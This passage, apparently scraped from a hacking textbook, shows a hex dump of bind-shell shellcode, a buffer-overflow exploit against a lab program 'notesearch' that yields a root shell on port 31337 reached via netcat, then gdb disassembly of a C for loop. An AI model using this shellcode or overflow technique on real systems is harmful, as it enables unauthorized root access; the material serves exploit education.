Graphics Programs Reference
In-Depth Information
00000030 80 b0 66 43 52 52 56 89 e1 cd 80 89 c3 6a 3f 58 |..fCRRV......j?X|
00000040 31 c9 cd 80 b0 3f 41 cd 80 b0 3f 41 cd 80 b0 0b |1....?A...?A....|
00000050 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 e2 |Rh//shh/bin..R..|
00000060 53 89 e1 cd 80 |S....|
00000065
reader@hacking:~/booksrc $ export SHELLCODE=$(cat bind_shell_beta)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff97f
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x7f\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
- ------[ end of note data ]-------
From another terminal window, the program netstat is used to find the
listening port. Then, netcat is used to connect to the root shell on that port.
reader@hacking:~/booksrc $ sudo netstat -lp | grep 31337
tcp 0 0 *:31337 *:* LISTEN 25604/notesearch
reader@hacking:~/booksrc $ nc -vv 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami
r oot
0x542
Branching Control Structures
The control structures of the C programming language, such as for loops
and if-then-else blocks, are made up of conditional branches and loops in the
machine language. With control structures, the repeated calls to dup2 could be
shrunk down to a single call in a loop. The first C program written in previous
chapters used a for loop to greet the world 10 times. Disassembling the main
function will show us how the compiler implemented the for loop using assem-
bly instructions. The loop instructions (shown below in bold) come after the
function prologue instructions save stack memory for the local variable i .
This variable is referenced in relation to the EBP register as [ebp-4] .
reader@hacking:~/booksrc $ gcc firstprog.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x08048374 <main+0>: push ebp
0x08048375 <main+1>: mov ebp,esp
0x08048377 <main+3>: sub esp,0x8
0x0804837a <main+6>: and esp,0xfffffff0
0x0804837d <main+9>: mov eax,0x0
0x08048382 <main+14>: sub esp,eax
0x08048384 <main+16>: mov DWORD PTR [ebp-4],0x0
0x0804838b <main+23>: cmp DWORD PTR [ebp-4],0x9
0x0804838f <main+27>: jle 0x8048393 <main+31>
0x08048391 <main+29>: jmp 0x80483a6 <main+50>
0x08048393 <main+31>: mov DWORD PTR [esp],0x8048484
0x0804839a <main+38>: call 0x80482a0 <printf@plt>
Search WWH ::




Custom Search